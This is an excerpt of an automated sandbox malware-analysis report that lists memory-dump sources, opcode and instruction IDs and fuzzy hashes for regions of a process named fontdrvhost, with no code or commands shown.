                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bb76682308b1333a3554d98fff90cf3c9dcb58e1809cebb46405344392a1dd11
                                                                    • Instruction ID: 9e7af658c5106bf3ffca77fc4011a71f5c2285df932dca05cdb4a8adb1a777e2
                                                                    • Opcode Fuzzy Hash: bb76682308b1333a3554d98fff90cf3c9dcb58e1809cebb46405344392a1dd11
                                                                    • Instruction Fuzzy Hash: 78711331A0DA8B8FD759DB68D0A06A4BBB0FF16340F5441B9C44AC7AC7DB38B890C795
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9f4010bb8d7431fb1b388f04562df4fc526b24c224b847198a14d4b38bb4f930
                                                                    • Instruction ID: ba6fc04664a3996a81b3bbf4f9985a535cf55ad62efb6bdf82535c9c26447092
                                                                    • Opcode Fuzzy Hash: 9f4010bb8d7431fb1b388f04562df4fc526b24c224b847198a14d4b38bb4f930
                                                                    • Instruction Fuzzy Hash: 8E51A132E1D54B8FEB65DBA488746BD7BB1FF59380F1405BAD00EE2182EE286841C785
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cfdefaf38ce7edd4bf1383b589ba338f30c060117f41147825af5c3f4e9a7f5f
                                                                    • Instruction ID: a0a145806a97894cddf063a1ab960741765db8e8b2a63909b631dab87b14e50d
                                                                    • Opcode Fuzzy Hash: cfdefaf38ce7edd4bf1383b589ba338f30c060117f41147825af5c3f4e9a7f5f
                                                                    • Instruction Fuzzy Hash: 3651C532F1D94B8EEBA5DBA588656BC7BB0FF49380F1404BAD04EE71D6DE3868418705
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 120f94ae00b363b3173be8ad676ff2e56c887f9a40ce00750e52c4efb57b4606
                                                                    • Instruction ID: 97a35d4f007ccf54db380795dc1e6e37bc087a386074bdfde4e4a0c56ccab969
                                                                    • Opcode Fuzzy Hash: 120f94ae00b363b3173be8ad676ff2e56c887f9a40ce00750e52c4efb57b4606
                                                                    • Instruction Fuzzy Hash: D651C231B0855E8FDB45FFA8D4A5AEC77A1FF58314F0401BAD40AD71AACE35A881C785
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4bc3c613cdd51337efa928444db5e36507974e5ee95307864429335f7f58959c
                                                                    • Instruction ID: 2158dacfa776107afc38f6bb1bb75ac8e1988a6bfd7042a4f4fda9d47ddc7c7d
                                                                    • Opcode Fuzzy Hash: 4bc3c613cdd51337efa928444db5e36507974e5ee95307864429335f7f58959c
                                                                    • Instruction Fuzzy Hash: F051D431E0A69E8FEB60EB68C8586E9B3E0FF65310F0540B6D44DC71A1DE746A84CF01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 30f1ca52208a3b3b6a87490e28aaf1ca8b57730e1d15a4fb627a13cec141abea
                                                                    • Instruction ID: 1b8fb49a8b9fd336a4d60be61d19768da0872ee241d524e30c393a9dc724b61a
                                                                    • Opcode Fuzzy Hash: 30f1ca52208a3b3b6a87490e28aaf1ca8b57730e1d15a4fb627a13cec141abea
                                                                    • Instruction Fuzzy Hash: EE517C70A0590E9FCF84EF98D494EEDBBF1FF68325B050169E419E7260DA74E990CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b1c776a0964c730583b38db162f4bb67b6a01a0f6551131f45f2dc98081202b7
                                                                    • Instruction ID: ad0f3a34efa7416e64470dcf8d2259ae8a1a30d9fe9da76b16fb99eb463d497e
                                                                    • Opcode Fuzzy Hash: b1c776a0964c730583b38db162f4bb67b6a01a0f6551131f45f2dc98081202b7
                                                                    • Instruction Fuzzy Hash: 2741E421A1C55B4EEBBC9658C4B06F4B7B1FF95340F3441BAD05ED7186CD3C69818749
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c66e81d03a13b729e3d82aa17e519c75be4594a69649dc72cf5851b966e6ca04
                                                                    • Instruction ID: 263482205da07e25065d8121f975ecf17d7625c51c49a1c48cec65843d13c50e
                                                                    • Opcode Fuzzy Hash: c66e81d03a13b729e3d82aa17e519c75be4594a69649dc72cf5851b966e6ca04
                                                                    • Instruction Fuzzy Hash: 0641533260CA098FDFA8EF58C4A59A5B3E1FB69310B0402A9D45EC31A6DE35FC45CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e6d0e6d32f313fc4651ce0558890ddea8434f88901a74a81cf912db3c3ad1ff7
                                                                    • Instruction ID: abde9b797f017e8ebc93f10f99ba1f8acaf2063cf1bce60f47a1cbc2983c1ae2
                                                                    • Opcode Fuzzy Hash: e6d0e6d32f313fc4651ce0558890ddea8434f88901a74a81cf912db3c3ad1ff7
                                                                    • Instruction Fuzzy Hash: 1541803260C9098FDFA8EF58C4A5DB4B7F1FB69320B14416AD45AC3292DE31E985CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e3cb7adb77aed50c342e48001783bbf761700c9e561c19db712e1d66bbab3da6
                                                                    • Instruction ID: 0ea932dd702f5712fb29582924dbca9f1f8e367bbb1d2ace5688f097ac955cf0
                                                                    • Opcode Fuzzy Hash: e3cb7adb77aed50c342e48001783bbf761700c9e561c19db712e1d66bbab3da6
                                                                    • Instruction Fuzzy Hash: A1315F23F0E65A0FE721BBBDE8B65ED3B90EF51375F0901B3D0D9860A3ED2915098252
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a932e210ea02952cc7c64b63660c3d141d20efef3094ca048dbc9c45cc290109
                                                                    • Instruction ID: e1134dedfad6d64148b9efb28153d067dc00b0a242214ecc4bbad1180e61a043
                                                                    • Opcode Fuzzy Hash: a932e210ea02952cc7c64b63660c3d141d20efef3094ca048dbc9c45cc290109
                                                                    • Instruction Fuzzy Hash: D831923260C9498FDFACEF58C4A5DB4B7E1FB6931071441AAD45AC7192CE35EC85CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c77bd8739d68ef62df9145f108e0a30178af0ef35428cec8fef29e6e9148de8
                                                                    • Instruction ID: cf61464fc938ffb625b3a31f32f4262a43a77b613fddc46b2275aa3e6955de2c
                                                                    • Opcode Fuzzy Hash: 0c77bd8739d68ef62df9145f108e0a30178af0ef35428cec8fef29e6e9148de8
                                                                    • Instruction Fuzzy Hash: C231623260CA498FDB6CEF18C4A5DA4B3E1FB69310B0502A9D45AC71A6CE35EC85CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aaf464714d23ba57345522e7c6f88488ce623f0d83b58aa52f689d9ae2373229
                                                                    • Instruction ID: b1049924246f882dac8b6fe7c097e1ba44dc539cb282d183ee4e919176ecf06d
                                                                    • Opcode Fuzzy Hash: aaf464714d23ba57345522e7c6f88488ce623f0d83b58aa52f689d9ae2373229
                                                                    • Instruction Fuzzy Hash: F141BF32F1D91B8FEB64EB98C8A19FC77B1FF54350F500076D04AAB196DE2568418784
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3741c30a7218f2e68c472a208969f7b6721be8967a6001cc48cb2ea6607be0ee
                                                                    • Instruction ID: 2237b0d867bfa3addcaa269f3844fd8835f3608bb7e493a5efa6b469fd27c9c7
                                                                    • Opcode Fuzzy Hash: 3741c30a7218f2e68c472a208969f7b6721be8967a6001cc48cb2ea6607be0ee
                                                                    • Instruction Fuzzy Hash: E7317E3260C9098FDFA8EF58C4A5DB4B7F1FB6931071441AAD45AC7292CE35E985CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5c2a38bbd80eefaf4afbc9e726feabcbec2117eb976e5035ad575ec8098be5cc
                                                                    • Instruction ID: d3b63270e02e93623c8339a1115ba8cfb739764afcbb0b6c6ba81dc6b9d5c09a
                                                                    • Opcode Fuzzy Hash: 5c2a38bbd80eefaf4afbc9e726feabcbec2117eb976e5035ad575ec8098be5cc
                                                                    • Instruction Fuzzy Hash: B831323260CA498FDF68EF18C4A59A4B3E1FB69310B0502A9D45EC71A6DE35FC85CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d789c99e5895a939d2dc3848ee9ce25deb235c8d6e8f9c96b02a1d413f815a54
                                                                    • Instruction ID: fc3c1c26603c6a0de278e1f7ac9f02347955d2a50e6a8ca1c6256cadb0d5cb95
                                                                    • Opcode Fuzzy Hash: d789c99e5895a939d2dc3848ee9ce25deb235c8d6e8f9c96b02a1d413f815a54
                                                                    • Instruction Fuzzy Hash: 34410B70E1491D8FDF94EF98C895AEDB7F1FF68315F10016AE409E3299CA34A981CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c00900b979151455b141ccb23f1434ae8963340fb1be164f89b6d04003eb6900
                                                                    • Instruction ID: 042b24525e756607f2632b0095818132be7d161ee1a19641ccfefd7bd952cf4f
                                                                    • Opcode Fuzzy Hash: c00900b979151455b141ccb23f1434ae8963340fb1be164f89b6d04003eb6900
                                                                    • Instruction Fuzzy Hash: 6331CF12A0EAD70FE76297B858745A43FB2EF97290B0D41F7D499CB0D7DD1CA8058386
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 334b685bb77bc218a29cd46149a8d62078e7dd688f49efc9a8404604a0529fe5
                                                                    • Instruction ID: 98891814eef074080f6881488a5252f6aa67f18f176d1b8effd2e55990957e59
                                                                    • Opcode Fuzzy Hash: 334b685bb77bc218a29cd46149a8d62078e7dd688f49efc9a8404604a0529fe5
                                                                    • Instruction Fuzzy Hash: D14187B0A4491C8FDBA4DB14C854BE9B7F0FB68305F1041EAD10EE3295DB75AAC48F45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f8e6e7f6cee01122f5da0ddff4d4ace28cb7f5871c2eb8dc3a508ac482178af2
                                                                    • Instruction ID: cccfff465865601ff90077b7983697514f1b5e37b5485ea3bff378493b909329
                                                                    • Opcode Fuzzy Hash: f8e6e7f6cee01122f5da0ddff4d4ace28cb7f5871c2eb8dc3a508ac482178af2
                                                                    • Instruction Fuzzy Hash: 6431243170CA498FDF9DEF18C4A5EA9B7E1FB69310B0441A9D44AC7292DE35EC85CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    • Instruction ID: c56a1796b036a5cadc2cdc36c408dce294fd3ae7606c53fd2d22455d8c47331d
                                                                    • Opcode Fuzzy Hash: 49dc804eebf76db433469f4e534a08d63bff68d2114a25ee6fc1b23d8be885ed
                                                                    • Instruction Fuzzy Hash: 27119231E1881EDFDFA8EB99D4A09EDB7B1FF58344F50057AD00EE3295CA3468418B54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 314f1ac0b346bfa732352059bb14de0d694f24d789853697903efdb36887edf3
                                                                    • Instruction ID: 2432943e878e80ab3724c1f37749bcf3a04a11e244c0aa0a864535d3156a6d26
                                                                    • Opcode Fuzzy Hash: 314f1ac0b346bfa732352059bb14de0d694f24d789853697903efdb36887edf3
                                                                    • Instruction Fuzzy Hash: AF21D870E4A62D8EEB74EF54C859BA9B3B1EB94301F1042E9D40DA22A0DFB45B84CF44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2c92bf6f24e4d8a0381e3ffcf511e90474b528085319a77b7deb45bb48ee0d22
                                                                    • Instruction ID: 15d9a2b3b9c4047868c5fb4116141bd422c5655a02b41bff2eea99bab61364a4
                                                                    • Opcode Fuzzy Hash: 2c92bf6f24e4d8a0381e3ffcf511e90474b528085319a77b7deb45bb48ee0d22
                                                                    • Instruction Fuzzy Hash: 11012C3060854D9FDB84EF98D895AEE7BE0FF64301F0100A6E858C3165CA30E5A5CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 38d2ae9b40e01ea4391cdf2590884496de028970a674d6282c467a8288703b6c
                                                                    • Instruction ID: 0de2aa66660ac7703ebd41422f24a13adab1e9a50a14956f34ddf850278f7124
                                                                    • Opcode Fuzzy Hash: 38d2ae9b40e01ea4391cdf2590884496de028970a674d6282c467a8288703b6c
                                                                    • Instruction Fuzzy Hash: CCF02612A0CA478BF779DBA890750B83BB0EF15340F0406BAC05BD24D2EE18B8414381
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4583c2ba19656c31cb865b77a5996a89d1086babf24e181f0a81c986aecedd26
                                                                    • Instruction ID: 048a137d278f508813a34666ff35c06884a5ca6be7264c14c9fed119c2e39415
                                                                    • Opcode Fuzzy Hash: 4583c2ba19656c31cb865b77a5996a89d1086babf24e181f0a81c986aecedd26
                                                                    • Instruction Fuzzy Hash: 65012930E0555E8FEB74EB18C8987E9B3B1EF94301F1082F5D41DA2299DA741E81CF44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e7eb1e6881778821525c5971643fba51a4ef81b31ef8c71385bc34fdc07dee0b
                                                                    • Instruction ID: 49c8bd6ef03ed2565b99043494dcf68b92f85ee0e4bea34bfa13de3766edfe1a
                                                                    • Opcode Fuzzy Hash: e7eb1e6881778821525c5971643fba51a4ef81b31ef8c71385bc34fdc07dee0b
                                                                    • Instruction Fuzzy Hash: 12F05430E4560E9FEBA0EFA8D4596ED77E0FF54304F114437E81CC21A0DAB46690C784
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c24d933ba1f745f82d880346f083b029f9d907220e3d00da3aeb23e0e8f9906a
                                                                    • Instruction ID: 4f9c20cc620671a0530dfc2689d9986a4c51c6930a14fae134a8a1539bbfdc2c
                                                                    • Opcode Fuzzy Hash: c24d933ba1f745f82d880346f083b029f9d907220e3d00da3aeb23e0e8f9906a
                                                                    • Instruction Fuzzy Hash: 42F0123091564D9FDB90EFA4C4496EE7BE0FF14304F014466E81DD2160DA74A6A0CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2316496969008f09d09659316c41d102bc1514a271f663463e6ca2992d79f741
                                                                    • Instruction ID: 624e35642214ee15d999bd8f63e82883b7e966dd486ddec683d6d8aad9ca39c9
                                                                    • Opcode Fuzzy Hash: 2316496969008f09d09659316c41d102bc1514a271f663463e6ca2992d79f741
                                                                    • Instruction Fuzzy Hash: 9BF01530508A0ECFDF90EF68C944AAA37A1FF28301F000165F41DC31A4DB70EAA0CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d766cce74b21b06da0dc4e7595b5aea7c76baea1a70b2ed1350f2d727a90a501
                                                                    • Instruction ID: 6938539bc20f30bf55ea480e924cd0a2bc2089614e45232d943650fe06b75454
                                                                    • Opcode Fuzzy Hash: d766cce74b21b06da0dc4e7595b5aea7c76baea1a70b2ed1350f2d727a90a501
                                                                    • Instruction Fuzzy Hash: 87E09A3281D38A8BE761DB5488760EC7B30BF00340F5801EAD90A16282DA6466189282
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1652889e5684e795787387994b6d85b161bcc6c744b848f2ef70e8d86f41ed73
                                                                    • Instruction ID: 32ee338efd8156dc670772b20a5067087a261245e430bbda5d8e9bc5cbf43b2c
                                                                    • Opcode Fuzzy Hash: 1652889e5684e795787387994b6d85b161bcc6c744b848f2ef70e8d86f41ed73
                                                                    • Instruction Fuzzy Hash: 30E0C202B0C6838FF73286B40CB50782FA09F0B3C0B1409F5D18A9A2D3D9183C049319
                                                                    Uniqueness

